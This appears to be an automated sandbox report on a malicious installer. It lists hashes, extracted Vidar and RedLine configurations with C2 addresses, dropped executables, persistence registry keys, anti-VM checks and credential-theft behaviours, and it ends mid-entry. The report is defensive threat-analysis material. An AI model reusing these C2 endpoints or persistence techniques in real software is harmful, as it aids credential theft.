Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
652s -
max time network
1811s -
platform
windows7_x64 -
resource
win7-de -
submitted
12-09-2021 07:11
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
djvuredlinesmokeloadersocelarsvidar328706pab123aspackv2backdoordiscoveryevasioninfostealerpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
djvuraccoonredlinesmokeloadersocelarsvidar706pab123aspackv2backdoordiscoveryevasioninfostealerpersistenceransomwarespywarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
djvuredlinesmokeloadersocelarsvidar706pab123aspackv2backdoordiscoveryinfostealerpersistenceransomwarespywarestealertrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
elysiumstealerredlinesocelarsvidar706pab123aspackv2discoveryevasioninfostealerpersistencespywarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
netsupportredlinesocelarsvidaraspackv2discoveryevasioninfostealerpersistenceratspywarestealerthemidatrojan
windows11_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
elysiumstealerredlinesmokeloadersocelarstofseevidar706pab123aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
redlinesmokeloadersocelarsvidar706pab123aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
redlinesmokeloadersocelarsvidar706pab123aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
redlinesmokeloadersocelarsvidar706pab123aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
redlinesmokeloadersocelarsvidar706pab123aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealertrojan
windows10_x64
0 signatures
0 seconds
General
-
Target
setup_x86_x64_install.exe
-
Size
3.5MB
-
MD5
1b5154bc65145adba0a58e964265d5f2
-
SHA1
5a96fd55be61222b3e6438712979dc2a18a50b8c
-
SHA256
c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19
-
SHA512
9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026
Malware Config
Extracted
Family
vidar
Version
40.5
Botnet
706
C2
https://gheorghip.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
redline
Botnet
pab123
C2
45.14.49.169:22411
Signatures
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2392 2212 rundll32.exe 58 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2296 2212 rundll32.exe 58 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1256 2212 rundll32.exe 58 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral4/memory/1916-189-0x00000000032C0000-0x00000000032DF000-memory.dmp family_redline behavioral4/memory/1916-198-0x0000000004820000-0x000000000483E000-memory.dmp family_redline -
Socelars Payload 4 IoCs
resource yara_rule behavioral4/files/0x0001000000012f24-111.dat family_socelars behavioral4/files/0x0001000000012f24-140.dat family_socelars behavioral4/files/0x0001000000012f24-163.dat family_socelars behavioral4/files/0x0001000000012f24-171.dat family_socelars -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral4/memory/920-184-0x00000000032C0000-0x0000000003391000-memory.dmp family_vidar behavioral4/memory/920-187-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x0001000000012f17-69.dat aspack_v212_v242 behavioral4/files/0x0002000000012f11-71.dat aspack_v212_v242 behavioral4/files/0x0001000000012f17-70.dat aspack_v212_v242 behavioral4/files/0x0002000000012f11-72.dat aspack_v212_v242 behavioral4/files/0x0001000000012f19-75.dat aspack_v212_v242 behavioral4/files/0x0001000000012f19-76.dat aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
flow pid Process 211 3324 MsiExec.exe 213 3324 MsiExec.exe 215 3324 MsiExec.exe 219 3324 MsiExec.exe 221 3324 MsiExec.exe 223 3324 MsiExec.exe 227 3324 MsiExec.exe 228 3324 MsiExec.exe 229 3324 MsiExec.exe 230 3324 MsiExec.exe 231 3324 MsiExec.exe 232 3324 MsiExec.exe 233 3324 MsiExec.exe 234 3324 MsiExec.exe 235 3324 MsiExec.exe 236 3324 MsiExec.exe 237 3324 MsiExec.exe 238 3324 MsiExec.exe 239 3324 MsiExec.exe 240 3324 MsiExec.exe 241 3324 MsiExec.exe 242 3324 MsiExec.exe 243 3324 MsiExec.exe 244 3324 MsiExec.exe 245 3324 MsiExec.exe 246 3324 MsiExec.exe 247 3324 MsiExec.exe 248 3324 MsiExec.exe 249 3324 MsiExec.exe 250 3324 MsiExec.exe 251 3324 MsiExec.exe 252 3324 MsiExec.exe 253 3324 MsiExec.exe 254 3324 MsiExec.exe 255 3324 MsiExec.exe 256 3324 MsiExec.exe 257 3324 MsiExec.exe 258 3324 MsiExec.exe 259 3324 MsiExec.exe 260 3324 MsiExec.exe 261 3324 MsiExec.exe 262 3324 MsiExec.exe 263 3324 MsiExec.exe 264 3324 MsiExec.exe 265 3324 MsiExec.exe 266 3324 MsiExec.exe 267 3324 MsiExec.exe 268 3324 MsiExec.exe 269 3324 MsiExec.exe 270 3324 MsiExec.exe 271 3324 MsiExec.exe 272 3324 MsiExec.exe 273 3324 MsiExec.exe 274 3324 MsiExec.exe 275 3324 MsiExec.exe 276 3324 MsiExec.exe 277 3324 MsiExec.exe 278 3324 MsiExec.exe 279 3324 MsiExec.exe 280 3324 MsiExec.exe 281 3324 MsiExec.exe 282 3324 MsiExec.exe 283 3324 MsiExec.exe 284 3324 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 54 IoCs
pid Process 1764 setup_installer.exe 1644 setup_install.exe 920 Sun05ac1b0207d3ff3b8.exe 1108 Sun05532f7abc.exe 1916 Sun052bbd8bebd9.exe 1608 Sun05899db881f67fb29.exe 648 Sun059375dac544fc4a.exe 1420 Sun05640630a6aa.exe 1724 Sun050462125c7d35.exe 1752 Sun05d60bc3b96248e5.exe 804 Sun05fa3b4d2ae56e.exe 520 Sun054fe19a12cb3.exe 1044 Sun054fe19a12cb3.tmp 2528 LzmwAqmV.exe 2592 8873424.exe 2656 conhost.exe 2692 5533121.exe 2712 PublicDwlBrowser1100.exe 2780 2.exe 2924 7035165.exe 2968 WinHoster.exe 3004 5675673.exe 2816 setup.exe 2172 udptest.exe 2400 setup_2.exe 1228 3979967.exe 2324 setup_2.tmp 1840 jhuuee.exe 2356 setup_2.exe 2628 BearVpn 3.exe 2680 3002.exe 2772 setup_2.tmp 1960 5058535.exe 2480 1643021.exe 948 3979967.exe 584 3803641.exe 2436 46807GHF____.exe 2084 2007722.exe 1784 postback.exe 816 C3KHKEn~m73GVLA.exE 1084 services64.exe 1876 ultramediaburner.exe 1640 ultramediaburner.tmp 1336 UltraMediaBurner.exe 2668 SHutorakaepae.exe 2032 SHaesharityvi.exe 1792 FVSCYGY9c.exe 2092 sihost64.exe 3772 8cL2V1GZT.exe 1228 3979967.exe 2672 AdvancedWindowsManager.exe 4012 installer.exe 4080 anyname.exe 3220 gcleaner.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7035165.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7035165.exe -
Loads dropped DLL 64 IoCs
pid Process 2028 setup_x86_x64_install.exe 1764 setup_installer.exe 1764 setup_installer.exe 1764 setup_installer.exe 1764 setup_installer.exe 1764 setup_installer.exe 1764 setup_installer.exe 1644 setup_install.exe 1644 setup_install.exe 1644 setup_install.exe 1644 setup_install.exe 1644 setup_install.exe 1644 setup_install.exe 1644 setup_install.exe 1644 setup_install.exe 428 cmd.exe 428 cmd.exe 1056 cmd.exe 1056 cmd.exe 268 cmd.exe 268 cmd.exe 380 cmd.exe 1068 cmd.exe 1540 cmd.exe 976 cmd.exe 988 cmd.exe 920 Sun05ac1b0207d3ff3b8.exe 920 Sun05ac1b0207d3ff3b8.exe 1916 Sun052bbd8bebd9.exe 1916 Sun052bbd8bebd9.exe 1744 cmd.exe 1744 cmd.exe 1420 Sun05640630a6aa.exe 1420 Sun05640630a6aa.exe 1796 cmd.exe 1752 Sun05d60bc3b96248e5.exe 1752 Sun05d60bc3b96248e5.exe 520 Sun054fe19a12cb3.exe 520 Sun054fe19a12cb3.exe 520 Sun054fe19a12cb3.exe 1044 Sun054fe19a12cb3.tmp 1044 Sun054fe19a12cb3.tmp 1044 Sun054fe19a12cb3.tmp 2404 rundll32.exe 2404 rundll32.exe 2404 rundll32.exe 2404 rundll32.exe 2528 LzmwAqmV.exe 2528 LzmwAqmV.exe 2528 LzmwAqmV.exe 2528 LzmwAqmV.exe 2692 5533121.exe 2692 5533121.exe 2528 LzmwAqmV.exe 2528 LzmwAqmV.exe 2692 5533121.exe 2924 7035165.exe 2924 7035165.exe 2968 WinHoster.exe 2968 WinHoster.exe 3004 5675673.exe 3004 5675673.exe 2528 LzmwAqmV.exe 2528 LzmwAqmV.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/memory/2924-237-0x0000000000C40000-0x0000000000C41000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5533121.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Wykefuleje.exe\"" 46807GHF____.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7035165.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 23 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 694 checkip.amazonaws.com 802 checkip.amazonaws.com 917 checkip.amazonaws.com 1209 checkip.amazonaws.com 329 checkip.amazonaws.com 493 checkip.amazonaws.com 368 checkip.amazonaws.com 471 checkip.amazonaws.com 838 checkip.amazonaws.com 908 checkip.amazonaws.com 11 ip-api.com 335 checkip.amazonaws.com 534 checkip.amazonaws.com 969 checkip.amazonaws.com 1169 checkip.amazonaws.com 1239 checkip.amazonaws.com 344 checkip.amazonaws.com 383 checkip.amazonaws.com 790 checkip.amazonaws.com 879 checkip.amazonaws.com 943 checkip.amazonaws.com 350 checkip.amazonaws.com 362 checkip.amazonaws.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2924 7035165.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 948 set thread context of 1228 948 3979967.exe 101 PID 1784 set thread context of 2536 1784 postback.exe 118 PID 1084 set thread context of 3924 1084 services64.exe 137 -
Drops file in Program Files directory 18 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-QT3BF.tmp setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-5A7DE.tmp ultramediaburner.tmp File created C:\Program Files (x86)\Windows Portable Devices\Wykefuleje.exe.config 46807GHF____.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files\Java\LSOFBQZDLS\ultramediaburner.exe 46807GHF____.exe File created C:\Program Files\Java\LSOFBQZDLS\ultramediaburner.exe.config 46807GHF____.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Windows Portable Devices\Wykefuleje.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-8TURQ.tmp ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe -
Drops file in Windows directory 30 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSID5AB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF13D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6679.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB924.tmp msiexec.exe File opened for modification C:\Windows\Installer\f78a2d4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIB6F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE6CD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E3B.tmp msiexec.exe File created C:\Windows\Installer\f78a2d8.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIDE76.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICFA3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID79F.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIE7AB.tmp msiexec.exe File created C:\Windows\Installer\f78a2d6.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIA535.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC3DF.tmp msiexec.exe File opened for modification C:\Windows\Installer\f78a2d6.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIEF37.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE076.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI309.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI30A.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\Installer\f78a2d4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID127.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDA1F.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIB195.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
pid pid_target Process procid_target 1972 920 WerFault.exe 36 2496 2780 WerFault.exe 67 2500 2592 WerFault.exe 63 392 3004 WerFault.exe 72 3616 1792 WerFault.exe 127 848 948 WerFault.exe 92 3376 2084 WerFault.exe 95 1668 2480 WerFault.exe 90 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3100 schtasks.exe 2916 schtasks.exe -
Kills process with taskkill 7 IoCs
pid Process 3288 taskkill.exe 884 taskkill.exe 1780 taskkill.exe 1896 taskkill.exe 2192 taskkill.exe 1556 taskkill.exe 1780 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9BF7C2C1-1398-11EC-A847-FA95CBBE371C} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\de-DE = "de-DE.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338195678" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000c4964a7d1f50522ed27914f1d3587014026fe9bd9e65979f47250bcf13b72872000000000e8000000002000020000000246c3f9a41d2ee0626df6b0761174c1c4b960c1d288b60354d01e2c7ddab93262000000057cff542619057742adc865c0d1f6da244cfe794ba2e08c97228a6909584210640000000bca87db7706e372bb12d9374bba5ce8b3dae76b51b889c93fcd86d5c3cbc2325c79d9015b6c1fc8d37d5bcf80ce5d05d0e0a822fcf67296caa07f9e2df6e1bc3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00c52f94a5a7d701 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca0000000002000000000010660000000100002000000026bbb4a04d8019044e69730e690d8bffc487253555a2da05671cfd818f6fb2c1000000000e8000000002000020000000f1583d358aee4042c37c2ace577116e6a554bba3675444f05dd8765ad83df28c90000000dd2616655d89dde548497c36cb83483964e68c2be60552f03c4caa4a1928d8b20aef6ac0be0f85864d4c793b531f928becdafc5f91836fdecd085c39e64f4268b834e5cd27cb14cbd05233ee31a6d474073b98e136d90dd06dda6db04a9732e38012ec577e6bc1ae79ea70deabc4926cd8dbe5e87caa883be10d11781835a478d1804fea5f28c93703b94075c731b0ce400000001c7b63e58e4acdc5a069894333067b1b3e35233f033038b05e88d8eeac0239a08a300d2c32b0fccd2674aacda9c7ecfc9c7219e7615abfb62694ec251ef5ac8a iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E msiexec.exe -
Modifies registry class 24 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = 